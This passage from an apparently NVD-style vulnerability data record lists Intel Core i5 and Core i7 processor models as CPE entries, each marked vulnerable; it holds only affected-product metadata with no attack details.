                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4360u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4430s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4440:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4440s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4570t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4570te:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4670s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4670t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:5257u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:5287u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:5300u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:6260u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:6267u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:6400t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:6402p:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:6600:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:6600k:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:430m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:430um:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:520um:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:540m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:660:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:661:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:670:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:2320:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:2380p:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:2435m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:2450m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:2510e:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:2515e:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:2520m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:3317u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:3320m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:3340s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:3350p:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:3470:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:3470s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:3570s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:3570t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4210h:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4210m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4288u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4300m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4330m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4340m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4422e:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4430:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4570r:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4570s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4670k:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4670r:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:5200u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:5250u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:5675r:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:6200u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:6360u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:6400:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:6500t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:6500te:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:6585r:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:8400:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:8600k:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:2400s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:2405s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:2500:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:2500k:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:2550k:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:2557m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:3337u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:3339y:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:3427u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:3437u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:3550:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:3550s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4200m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4200u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4220y:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4250u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4258u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4302y:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4308u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4400e:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4402e:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4460:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4460s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4590:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4590s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4690:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4690k:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:5350h:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:5350u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:6287u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:6300hq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:6440eq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:6440hq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:6600t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:6685r:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:520e:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:520m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:650:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:655k:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:2300:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:2310:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:2410m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:2430m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:2500s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:2500t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:3210m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:3230m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:3340:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:3340m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:3439y:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:3450:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:3450s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:3570:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:3570k:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4200y:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4202y:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4260u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4278u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4310m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4310u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4402ec:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4410e:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4460t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4570:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4590t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4670:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4690s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4690t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:5575r:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:5675c:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:6300u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:6350hq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:6442eq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:6500:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:8250u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:8350u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:7y75:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:640lm:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:640m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:820qm:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:840qm:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:920:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:920xm:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:970:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:975:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:620ue:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:620um:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:720qm:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:740qm:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:610e:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:620le:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:640um:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:660lm:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:860:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:860s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:930:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:940:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:980:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:980x:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:990x:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:2629m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:2630qm:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:2670qm:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:2675qm:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:2820qm:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:2860qm:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:2920xm:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:3555le:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:3610qe:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:3632qm:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:3635qm:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:3770s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:3770t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4578u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4600m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4700hq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4700mq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4720hq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4722hq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4770r:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4770s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4790s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4790t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4950hq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4960hq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:5700eq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:5700hq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:7500u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:7560u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:7567u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:7820eq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:7820hk:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:2617m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:2620m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:2655le:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:2657m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:2720qm:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:2760qm:*:*:*:*:*:*:*",
                "cpe_name": [],
